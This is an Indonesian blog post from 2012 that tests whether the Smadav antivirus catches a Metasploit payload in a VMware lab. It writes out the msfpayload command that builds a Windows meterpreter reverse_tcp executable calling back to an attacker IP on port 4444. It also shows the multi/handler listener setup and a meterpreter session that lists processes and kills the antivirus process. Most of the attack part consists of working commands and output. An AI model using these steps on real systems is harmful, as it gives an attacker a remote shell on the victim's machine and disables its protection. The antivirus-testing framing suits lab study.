Selasa, 17 April 2012

metasploits vs smadav

Exploitasi memang meresahkan, apalagi yang namanya payload. Bicara masalah payload nih, payload itu sebuah shell code yang terbungkus amplop (esktensi) yang mampu melakukan eksploitasi system. Cara ampuh untuk mencegah kejadian exploitation adalah dengan menggunakan antivirus.  

Pada kesempatan ini, saya akan mencoba mengetes seberapa baik Smadav (Anti Virus Lokal) bekerja. Ini adalah pride fighting (pertarungan harga diri)



Tidak perlu ada preparation ya? Karena ini hanya testing. Kalo mau mencoba sendiri silahkan. =)

Di dini saya memiliki VMware sebagai virtual machine saya untuk mengetest seberapa jauh kehebatan smadav dalam bekerja. MEngapa saya menggunakan VMware? Karena VMware dapat melakukan copy-paste dari host ke VMware dengan metode drag and drop. Tidak seperti Virtual Box. Hal ini mempermudah saya untuk mengirimkan file exploit ke target untuk selanjutnya di scan oleh antivirus setempat (smadav).

Dimulai dari membuat file exploit dengan perintah

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.234 LPORT=4444 X > /root/Desktop/exploit.exe

Saya taruh di desktop supaya mudah drag and drop nya =D
Kemudian menaruh file exploit ke komputer target. Dan saya scan file tersebut dengan smadav. Antivirus yang baik mampu membaca file tersebut sebagai virus, mengingat file ini berfungsi layaknya virus trojan horse.

Hasilnya mngejutkan.


Smadav tidak dapat membaca file tersebut sebagai virus. Padahal smadav sudah saya update!!!

Lalu apa yang terjadi jika saya jalankan file ini?
Sebelumnya saya telah menyiapkan exploit multi/handler dengan perintah

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.21.0.234 
LHOST => 10.21.0.234
msf  exploit(handler) > set LPORT 4444 
LPORT => 4444
msf  exploit(handler) > exploit -j

Pada msfconsole

Dan setelah file exploit.exe di run, ini yang akan terjadi


Batapa berbahayanya jika ini terjadi. Anda bisa melihat post sebelumnya tentang messing with meterpreter pada blog ini.

Contoh, saya akan mencoba mengakhiri proses smadav
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                           Path
 ---   ----               ----  -------  ----                           ----
 0     [System Process]                                                 
 1016  svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1076  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1124  TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 1128  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1420  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1444  alg.exe            x86   0                                       C:\WINDOWS\System32\alg.exe
 1564  exploit.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\Documents and Settings\Administrator\Desktop\exploit.exe
 1584  explorer.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\Explorer.EXE
 1676  VMwareTray.exe     x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1684  vmtoolsd.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1692  rundll32.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\rundll32.exe
 1700  SM?RTP.exe         x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\Smadav\SM?RTP.exe
 1940  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1972  TPAutoConnect.exe  x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 316   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4     System             x86   0                                       
 536   wuauclt.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\wuauclt.exe
 560   smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 608   csrss.exe          x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 632   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 676   services.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 688   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 844   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 860   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 924   svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 984   wscntfy.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter > kill 1700
Killing: 1700
meterpreter > 

Perhatikan tray icon pada windows!!!

Sebelum


Sesudah [SMADAV telah TERBUNUH oleh meterpreter]



Jadi apa kesimpulannya?

Anda sendiri yang menentukan.

1 komentar: